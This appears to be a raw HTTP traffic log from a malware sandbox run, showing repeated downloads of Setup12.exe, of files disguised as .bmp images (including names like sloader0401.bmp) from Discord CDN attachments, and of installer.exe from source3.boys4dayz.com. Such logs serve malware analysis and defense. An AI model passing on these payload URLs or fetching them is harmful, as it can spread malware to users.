Content-Type: image/x-ms-bmp
Content-Length: 398336
Connection: keep-alive
CF-Ray: 6a91d77018970158-ICN
Accept-Ranges: bytes
Age: 2023618
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Service.bmp
ETag: "19b0bf2bb132231de9dd08f8761c5998"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Tue, 12 Oct 2021 13:58:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1634047084640154
x-goog-hash: crc32c=8rofXA==
x-goog-hash: md5=GbC/K7EyIx3p3Qj4dhxZmA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 398336
X-GUploader-UploadID: ADPycdvNYTbv9XMaMw4eqsPhAZ95SFF6BNMkHC4FIwFjV1JqAmYk09LSMZ2PfxLCVnYxOrXs6E137zs8vxYTubF9S3_V3qUOfw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cqVnnhn2bMJzBuBwcKrMObItmFvqj4UTqlxKUii8fq0xbukaSH0bcCLUcMb5yLkUTH8B8QwB2ZIO%2B7i2da7Ek8a8X5ujWcQD1xdSB%2BJ5TF%2BZP%2BlDeDkXa6nklXNZftwU%2BWa1jA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/905701898806493199/905894437480181790/Setup12.exe
GET /attachments/905701898806493199/905894437480181790/Setup12.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Content-Type: application/x-msdos-program
Content-Length: 2873495
Connection: keep-alive
CF-Ray: 6a91d772dab50fb5-ICN
Accept-Ranges: bytes
Age: 15316
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Setup12.exe
ETag: "8af36ff6b1f239d0fc0f82dd3d7456f1"
Expires: Sat, 05 Nov 2022 00:07:23 GMT
Last-Modified: Thu, 04 Nov 2021 19:01:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636052464778537
x-goog-hash: crc32c=0ksYgw==
x-goog-hash: md5=ivNv9rHyOdD8D4LdPXRW8Q==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 2873495
X-GUploader-UploadID: ADPycdvYr1VKpHEmMo8HFuXmvfg6QC4pFT9ofrS2FvARbOMAzYyrqm7OFz_8q36nQjg9EYbMrZGMDD0j7WXWNZldrQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEJeLctyaNY51XQilgDzfzt42eB6euAKX6G7%2FIRMRgN3Qs%2FLSMDK%2BUPXhfqj6A2bCa3aO91ZM3Q06SegiEqIZrYTuMulMPKTFkRHT434A0pO1FmOKZr4I4iRu4vUBx6j49wdqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905917017234735184/Topov0402.bmp
GET /attachments/891006172130345095/905917017234735184/Topov0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3452636
Connection: keep-alive
CF-Ray: 6a91d772ffb8e9cc-ICN
Accept-Ranges: bytes
Age: 12946
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Topov0402.bmp
ETag: "8aa88d50b7897e3e2f0f3a31fdfdf4d8"
Expires: Sat, 05 Nov 2022 00:07:23 GMT
Last-Modified: Thu, 04 Nov 2021 20:30:48 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636057848162625
x-goog-hash: crc32c=CkfqkA==
x-goog-hash: md5=iqiNULeJfj4vDzox/f302A==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3452636
X-GUploader-UploadID: ADPycdtaKwaeEaHRGwzihR_hQZ6KRo_n6I5OzG41jVPkn9bYjE2wDkquAb3mnOYmHSnS0pXpTpWeFUmQMtitI0N-OA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zwjTfAIECi%2FQugPOLukCl8Wr6%2BHFSiUWIYiMAFBNoO1tlZZjXXOqkgPd025nsW8hx%2BExZ5hRhN0mVQNOa1ILsm%2F%2F3KbUFp3HPm3Vd26Hksybf%2BvrVsnegPSP2XszkWuh8n6aRg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905797756076048394/IZI.bmp
GET /attachments/891006172130345095/905797756076048394/IZI.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:23 GMT
Content-Type: image/x-ms-bmp
Content-Length: 71612
Connection: keep-alive
CF-Ray: 6a91d7731c5ee9e8-ICN
Accept-Ranges: bytes
Age: 41387
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=IZI.bmp
ETag: "9a616358b36ca79e55f94705254f6800"
Expires: Sat, 05 Nov 2022 00:07:23 GMT
Last-Modified: Thu, 04 Nov 2021 12:36:53 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636029413987616
x-goog-hash: crc32c=C9Cv5Q==
x-goog-hash: md5=mmFjWLNsp55V+UcFJU9oAA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 71612
X-GUploader-UploadID: ADPycdsTLdMScuUrkbkBf6Ezdx77rORrbGBSejXNRo5X5h4E2QyaYHFic8PWFZbvLsXX84izOlfDBfRXgXgdWfj2ow
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PHVrMG3IAPvGi6YW6%2FHrvCp7CrwqBodgMLcCfs8qFwuEk5J%2FSRe6Qsj661B94ann7OAfrhvmjare6A2%2FBPLJVBo1qU4X92ReNovqPTANzyLbPkBNVCOdw%2FN6UECw%2BRHYVQnHOw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905757933961359380/wetsetup0401.bmp
GET /attachments/891006172130345095/905757933961359380/wetsetup0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 178180
Connection: keep-alive
CF-Ray: 6a91d778785e3526-ICN
Accept-Ranges: bytes
Age: 50627
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=wetsetup0401.bmp
ETag: "f600fe66f83e4ecbdba99dfdaf92ca75"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 09:58:39 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636019919670184
x-goog-hash: crc32c=w+ul7Q==
x-goog-hash: md5=9gD+Zvg+TsvbqZ39r5LKdQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 178180
X-GUploader-UploadID: ADPycdtnV8AIEkuZTLn1KQaUTghKKgCKu9uYM7SQ6ffGPNXKcrJ5etN6FeC7j4nebSmjUQw3NpISi-C0S0iqFKmIXoj0fI1MWA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0JzbexO%2F5ixVF0BsSTa0Ad30DhqqI5cDu%2F6iip4IIG2NqAcT45O81CDkqIM03Wey8Qqcx4at%2BXDRq0vIP0G2C%2FoQumzjS6A6s%2BBDv9H7nGWbiJEyygAXPthnkkek1PgDsUl22Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905857242451046431/CKBReFn.bmp
GET /attachments/891006172130345095/905857242451046431/CKBReFn.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 6658618
Connection: keep-alive
CF-Ray: 6a91d778af42e9f4-ICN
Accept-Ranges: bytes
Age: 24679
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=CKBReFn.bmp
ETag: "d1b4840031302418a5b4f644fb176442"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 16:33:16 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636043596740796
x-goog-hash: crc32c=3Ogdcg==
x-goog-hash: md5=0bSEADEwJBiltPZE+xdkQg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 6658618
X-GUploader-UploadID: ADPycduLJy22GUlvlqGioYBDhsbumkmzhtnUtrh9cHNbeyE6gWVMqJH3SFuITH2H5kdtz5NZIHhKLpizLiyflCHS6g
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlKyvQiRFwVFmapMTU7ryqzAf3anQUZaDhPFS9%2FCKTw5m1EjkIGj1KbZYDoTfi11VWYiN4YVPtd4nyso3O%2ByVknt3SS%2FXJYmm7WN9qoeiV84Z3ZOsg%2FZEfJl0S2tfv9514p59g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905726762028240896/4chee.bmp
GET /attachments/891006172130345095/905726762028240896/4chee.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3535068
Connection: keep-alive
CF-Ray: 6a91d778be66e9cc-ICN
Accept-Ranges: bytes
Age: 57556
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=4chee.bmp
ETag: "f2450bebf844c7e16864edf376fbc11a"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 07:54:47 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636012487824445
x-goog-hash: crc32c=qX4c6g==
x-goog-hash: md5=8kUL6/hEx+FoZO3zdvvBGg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3535068
X-GUploader-UploadID: ADPycduhvn19mnWLBi_4LatOA9uAWScoGrHYxC4ls_NerTvr2u7fyHH53NHGeqhjBK1BMXOoRWWqLTvs1lrNfDOe-N48DL-UNQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kFxfKRw%2Fr1wM4189aljJbhQFioFIkGNh1dqeqTU9DF5Ol3rKrNCX2gy5v%2FivSuZFQMG%2B%2BR9hL0fbOV%2BcH30s1PxfuSFo9HvwgoBBrSFV%2FvX16fagI8acP8v5IjAuhs4oNCy5Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905919347988508692/Passat0402.bmp
GET /attachments/891006172130345095/905919347988508692/Passat0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3527900
Connection: keep-alive
CF-Ray: 6a91d77a6e3e0fbd-ICN
Accept-Ranges: bytes
Age: 11027
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Passat0402.bmp
ETag: "10f92d4f497c8d410cf0dcaf9cd3e8c4"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 20:40:03 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636058403833602
x-goog-hash: crc32c=1NNsSA==
x-goog-hash: md5=EPktT0l8jUEM8NyvnNPoxA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3527900
X-GUploader-UploadID: ADPycdv7or-1rDfZRPLy-GbcyFfuTuGyEvNOXdVFNG7nO_-V5lYKsgUzdjd8q0kPxkMyNUZXoeNW7jGzP8kd0rQ_YYa4wK2gJQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Srl%2BCvaDJcyJJ43sEkqyVDLfgYzzTFIMZjtcMsghvb1nbRMIZjrhOOiBRwENla8oYG2EhSAxeDTbbxBGD6jE4aJUmb9kX10GgRfWbFS87SoOS2jqOGGgNridZKbzVlVfQkcKuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905797756076048394/IZI.bmp
GET /attachments/891006172130345095/905797756076048394/IZI.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 71612
Connection: keep-alive
CF-Ray: 6a91d77a98f861b9-ICN
Accept-Ranges: bytes
Age: 41388
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=IZI.bmp
ETag: "9a616358b36ca79e55f94705254f6800"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 12:36:53 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636029413987616
x-goog-hash: crc32c=C9Cv5Q==
x-goog-hash: md5=mmFjWLNsp55V+UcFJU9oAA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 71612
X-GUploader-UploadID: ADPycdsTLdMScuUrkbkBf6Ezdx77rORrbGBSejXNRo5X5h4E2QyaYHFic8PWFZbvLsXX84izOlfDBfRXgXgdWfj2ow
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HdCnC4bDA5A5%2Fz4i%2FuWp%2BSQvNmzV8jiyFXbO7oVwzHf0PornjP8Xe8U%2B0zZSO86N%2FQ%2F%2FHFDl2pdA5eZXv3hnlG6wbm%2FuPx23x%2FR4pDoDi3e0v8MpWEXkx6Xu31%2BXKXRiOkeaRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905857242451046431/CKBReFn.bmp
GET /attachments/891006172130345095/905857242451046431/CKBReFn.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 6658618
Connection: keep-alive
CF-Ray: 6a91d77c18850fac-ICN
Accept-Ranges: bytes
Age: 24679
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=CKBReFn.bmp
ETag: "d1b4840031302418a5b4f644fb176442"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 16:33:16 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636043596740796
x-goog-hash: crc32c=3Ogdcg==
x-goog-hash: md5=0bSEADEwJBiltPZE+xdkQg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 6658618
X-GUploader-UploadID: ADPycduLJy22GUlvlqGioYBDhsbumkmzhtnUtrh9cHNbeyE6gWVMqJH3SFuITH2H5kdtz5NZIHhKLpizLiyflCHS6g
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AgzKe%2FifO5WR07Foke0u77pMzNawFP6tAM2oKm%2BpJ8BQdreYWfhXzy4qHAc7SRliMb14jebke%2BI9xYckMTRMn7D4KGeXDCA3xXhIbZBnwBOAkUcTgQxfD%2FMRlblsadUaPhpHqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905726625025511474/sloader0401.bmp
GET /attachments/891006172130345095/905726625025511474/sloader0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 5453828
Connection: keep-alive
CF-Ray: 6a91d77c2a33351a-ICN
Accept-Ranges: bytes
Age: 57556
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=sloader0401.bmp
ETag: "00778de7b3c7ddb3b906a5d34dc98406"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 07:54:15 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636012455146460
x-goog-hash: crc32c=e4IP7Q==
x-goog-hash: md5=AHeN57PH3bO5BqXTTcmEBg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5453828
X-GUploader-UploadID: ADPycdu1ForXf3mYDfyiT2pcFSCwUB1Ap4gRhv7tFv5JqOO4WIMUNIrGq3QPXzVIDKbAyPDIHy5M6c_bbvxsCvHguKnOt8XIbA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nok6duEw%2BGy%2B0Cfsqn9w3XsMIL82%2Bl95S0ITJ2WFhAfdgeJeWiNm%2F7%2BmDOg%2ByiBIhXPIVUsIkH8BVejKA90IWeBXdr0L7LDb86NfG%2Bu%2FG%2F63NW9OMbiy8Yewc4yBBDQ%2FiVTxAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905799227140083712/real0402.bmp
GET /attachments/891006172130345095/905799227140083712/real0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 616452
Connection: keep-alive
CF-Ray: 6a91d77c2ebb61a1-ICN
Accept-Ranges: bytes
Age: 40843
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=real0402.bmp
ETag: "0abbac620fc5aa6125f1f754fcfb7414"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 12:42:44 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636029764735456
x-goog-hash: crc32c=Ab97mQ==
x-goog-hash: md5=CrusYg/FqmEl8fdU/Pt0FA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 616452
X-GUploader-UploadID: ADPycdv9_sIWLR0nl7xfhbI8Dn65JFajqI8JIULA-Nh3BI5yRXwDhh6sRAyX88rAf7RX_WQ30JR3K1vlcA61g0sv3A
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CBiyXiVtWIK%2F8FehtSuiz3doyT5hSPYVINueNaa6QBdo%2FNgmiq2nKDwQikNxJdC%2FKXSKSnjT9eyzL9EU4y2N%2BihJW9ChLr7ZSSbSAD7hnIm%2FytYYBw7R%2BCDK61YSgNVOEl1sRg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905757933961359380/wetsetup0401.bmp
GET /attachments/891006172130345095/905757933961359380/wetsetup0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:24 GMT
Content-Type: image/x-ms-bmp
Content-Length: 178180
Connection: keep-alive
CF-Ray: 6a91d77c78d661ac-ICN
Accept-Ranges: bytes
Age: 50627
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=wetsetup0401.bmp
ETag: "f600fe66f83e4ecbdba99dfdaf92ca75"
Expires: Sat, 05 Nov 2022 00:07:24 GMT
Last-Modified: Thu, 04 Nov 2021 09:58:39 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636019919670184
x-goog-hash: crc32c=w+ul7Q==
x-goog-hash: md5=9gD+Zvg+TsvbqZ39r5LKdQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 178180
X-GUploader-UploadID: ADPycdtnV8AIEkuZTLn1KQaUTghKKgCKu9uYM7SQ6ffGPNXKcrJ5etN6FeC7j4nebSmjUQw3NpISi-C0S0iqFKmIXoj0fI1MWA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OTyxVp0GVTWENnogcocq1yMe7G7iSWj8AaqbZZIi%2B3iXKlFOgkz9NBBLxskZi2qX4ZLSFenJsUjTOvvE8dYl3QpVOuo%2BwPm6DuvpJjTPESG%2FS8feSITFNN4%2BgJA5YnB45wSiHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://source3.boys4dayz.com/installer.exe
GET /installer.exe HTTP/1.1
Host: source3.boys4dayz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:25 GMT
Content-Type: application/octet-stream
Content-Length: 3628856
Connection: keep-alive
last-modified: Fri, 07 May 2021 09:32:20 GMT
etag: "60950924-375f38"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2334
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qse40Ji28LXg2PMcnaQGMaG%2FAkS5GCVyUz5VpnWamoisUjgjL%2B%2BaIx0NTSmoUjwz8iIfLHqR%2B0%2F836SlQSASE6%2BczpFhp9A7A3uOPrm8KhXBBeHbCRBhneNm6rSZYspxJT4KcGrB3WI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d77dce7aaf15-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905919347988508692/Passat0402.bmp
